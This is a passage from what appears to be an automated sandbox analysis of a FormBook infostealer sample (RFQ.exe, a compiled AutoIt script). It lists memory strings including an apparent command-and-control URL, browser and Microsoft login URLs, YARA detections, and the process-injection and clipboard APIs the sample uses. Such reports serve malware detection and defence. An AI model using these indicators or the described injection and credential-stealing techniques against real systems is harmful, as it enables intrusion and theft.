server.</p></body></html>
                Source: aSgPuBFuPS.exe, 00000005.00000002.3508624715.0000000005957000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wukong.college
                Source: aSgPuBFuPS.exe, 00000005.00000002.3508624715.0000000005957000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wukong.college/9ezc/
                Source: net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: net.exe, 00000003.00000002.3506249546.0000000000E3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: net.exe, 00000003.00000002.3506249546.0000000000E3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: net.exe, 00000003.00000002.3506249546.0000000000E3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: net.exe, 00000003.00000002.3506249546.0000000000E3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10335
                Source: net.exe, 00000003.00000002.3506249546.0000000000E3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: net.exe, 00000003.00000002.3506249546.0000000000E3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: net.exe, 00000003.00000003.1995564180.0000000007D56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: net.exe, 00000003.00000002.3508009639.0000000004016000.00000004.10000000.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.0000000003A36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=4nk.education
                Source: net.exe, 00000003.00000002.3509615989.0000000006330000.00000004.00000800.00020000.00000000.sdmp, net.exe, 00000003.00000002.3508009639.0000000004982000.00000004.10000000.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.00000000043A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=astorg-group.info
                Source: net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: net.exe, 00000003.00000002.3508009639.0000000004016000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000003.00000002.3509615989.0000000006330000.00000004.00000800.00020000.00000000.sdmp, net.exe, 00000003.00000002.3508009639.0000000004982000.00000004.10000000.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.00000000043A2000.00000004.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.0000000003A36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
                Source: net.exe, 00000003.00000002.3508009639.000000000433A000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000003.00000002.3508009639.00000000041A8000.00000004.10000000.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.0000000003BC8000.00000004.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006FEA26 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_006FEA26
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006FEC91 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_006FEC91
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006FEA26 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_006FEA26
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006EA975 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_006EA975
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00719468 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00719468

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.3a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3505942497.0000000000AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3507077238.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1821270543.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1820457508.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3506196404.0000000000DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1820800178.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3506950733.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\RFQ.exeCode function: This is a third-party compiled AutoIt script.0_2_0068445D
                Source: RFQ.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: RFQ.exe, 00000000.00000000.1659266041.0000000000742000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e31b94aa-3
                Source: RFQ.exe, 00000000.00000000.1659266041.0000000000742000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4e882fcf-1
                Source: RFQ.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a4c7d24c-0
                Source: RFQ.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_13bda58a-1
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: RFQ.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003CCA43 NtClose,1_2_003CCA43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172B60 NtClose,LdrInitializeThunk,1_2_03172B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03172DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031735C0 NtCreateMutant,LdrInitializeThunk,1_2_031735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03174340 NtSetContextThread,1_2_03174340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03174650 NtSuspendThread,1_2_03174650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172B80 NtQueryInformationFile,1_2_03172B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172BA0 NtEnumerateValueKey,1_2_03172BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172BF0 NtAllocateVirtualMemory,1_2_03172BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172BE0 NtQueryValueKey,1_2_03172BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172AB0 NtWaitForSingleObject,1_2_03172AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172AD0 NtReadFile,1_2_03172AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172AF0 NtWriteFile,1_2_03172AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172F30 NtCreateSection,1_2_03172F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172F60 NtCreateProcessEx,1_2_03172F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172F90 NtProtectVirtualMemory,1_2_03172F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172FB0 NtResumeThread,1_2_03172FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172FA0 NtQuerySection,1_2_03172FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172FE0 NtCreateFile,1_2_03172FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172E30 NtWriteVirtualMemory,1_2_03172E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172E80 NtReadVirtualMemory,1_2_03172E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172EA0 NtAdjustPrivilegesToken,1_2_03172EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172EE0 NtQueueApcThread,1_2_03172EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172D10 NtMapViewOfSection,1_2_03172D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172D00 NtSetInformationFile,1_2_03172D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172D30 NtUnmapViewOfSection,1_2_03172D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172DB0 NtEnumerateKey,1_2_03172DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172DD0 NtDelayExecution,1_2_03172DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172C00 NtQueryInformationProcess,1_2_03172C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172C70 NtFreeVirtualMemory,1_2_03172C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172C60 NtCreateKey,1_2_03172C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172CA0 NtQueryInformationToken,1_2_03172CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172CC0 NtQueryVirtualMemory,1_2_03172CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172CF0 NtOpenProcess,1_2_03172CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173010 NtOpenDirectoryObject,1_2_03173010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173090 NtSetValueKey,1_2_03173090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031739B0 NtGetContextThread,1_2_031739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173D10 NtOpenProcessToken,1_2_03173D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173D70 NtOpenThread,1_2_03173D70
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E4340 NtSetContextThread,LdrInitializeThunk,3_2_034E4340
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E4650 NtSuspendThread,LdrInitializeThunk,3_2_034E4650
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2B60 NtClose,LdrInitializeThunk,3_2_034E2B60
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2BE0 NtQueryValueKey,LdrInitializeThunk,3_2_034E2BE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_034E2BF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_034E2BA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2AD0 NtReadFile,LdrInitializeThunk,3_2_034E2AD0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2AF0 NtWriteFile,LdrInitializeThunk,3_2_034E2AF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2F30 NtCreateSection,LdrInitializeThunk,3_2_034E2F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2FE0 NtCreateFile,LdrInitializeThunk,3_2_034E2FE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2FB0 NtResumeThread,LdrInitializeThunk,3_2_034E2FB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2EE0 NtQueueApcThread,LdrInitializeThunk,3_2_034E2EE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_034E2E80
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_034E2D10
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_034E2D30
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2DD0 NtDelayExecution,LdrInitializeThunk,3_2_034E2DD0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_034E2DF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2C60 NtCreateKey,LdrInitializeThunk,3_2_034E2C60
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_034E2C70
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_034E2CA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E35C0 NtCreateMutant,LdrInitializeThunk,3_2_034E35C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E39B0 NtGetContextThread,LdrInitializeThunk,3_2_034E39B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2B80 NtQueryInformationFile,3_2_034E2B80
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2AB0 NtWaitForSingleObject,3_2_034E2AB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2F60 NtCreateProcessEx,3_2_034E2F60
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2F90 NtProtectVirtualMemory,3_2_034E2F90
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2FA0 NtQuerySection,3_2_034E2FA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2E30 NtWriteVirtualMemory,3_2_034E2E30
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2EA0 NtAdjustPrivilegesToken,3_2_034E2EA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2D00 NtSetInformationFile,3_2_034E2D00
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2DB0 NtEnumerateKey,3_2_034E2DB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2C00 NtQueryInformationProcess,3_2_034E2C00
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2CC0 NtQueryVirtualMemory,3_2_034E2CC0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E2CF0 NtOpenProcess,3_2_034E2CF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E3010 NtOpenDirectoryObject,3_2_034E3010
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E3090 NtSetValueKey,3_2_034E3090
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E3D70 NtOpenThread,3_2_034E3D70
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E3D10 NtOpenProcessToken,3_2_034E3D10
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_00B19310 NtCreateFile,3_2_00B19310
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_00B19480 NtReadFile,3_2_00B19480
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_00B19580 NtDeleteFile,3_2_00B19580
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_00B19620 NtClose,3_2_00B19620
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_00B19780 NtAllocateVirtualMemory,3_2_00B19780
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006ED509: CreateFileW,DeviceIoControl,CloseHandle,0_2_006ED509
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006E1145 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_006E1145
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006EE814 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_006EE814
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006E81EE0_2_006E81EE
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0068E3F00_2_0068E3F0
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006BE4A00_2_006BE4A0
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006B66FB0_2_006B66FB
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007147A80_2_007147A8
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006ACA300_2_006ACA30
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0068AB300_2_0068AB30
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006B6D790_2_006B6D79
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0069ADFD0_2_0069ADFD
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006892A00_2_006892A0
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006A13240_2_006A1324
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0069D3B50_2_0069D3B5
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006A16960_2_006A1696
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0069B7280_2_0069B728
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006A77AB0_2_006A77AB
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006A19400_2_006A1940
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006A79DA0_2_006A79DA
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006899D00_2_006899D0
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006A7C370_2_006A7C37
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006A1C070_2_006A1C07
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0070BD6B0_2_0070BD6B
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006A1EC20_2_006A1EC2
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0069BEAD0_2_0069BEAD
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006B9E8E0_2_006B9E8E
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006F1F640_2_006F1F64
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_017187180_2_01718718
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003B8A031_2_003B8A03
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003CF0431_2_003CF043
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003A31A01_2_003A31A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003A12001_2_003A1200
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003B02C31_2_003B02C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003B6C3E1_2_003B6C3E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003A1C301_2_003A1C30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003A1C281_2_003A1C28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003B6C431_2_003B6C43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003B04E31_2_003B04E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003A14D01_2_003A14D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003A2D301_2_003A2D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003A2D211_2_003A2D21
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003AE5631_2_003AE563
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003A25E01_2_003A25E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003A25DC1_2_003A25DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FA3521_2_031FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032003E61_2_032003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F01_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E02741_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C02C01_2_031C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA1181_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031301001_2_03130100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C81581_2_031C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032001AA1_2_032001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F41A21_2_031F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F81CC1_2_031F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D20001_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031647501_2_03164750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031407701_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313C7C01_2_0313C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315C6E01_2_0315C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031405351_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032005911_2_03200591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E44201_2_031E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F24461_2_031F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EE4F61_2_031EE4F6
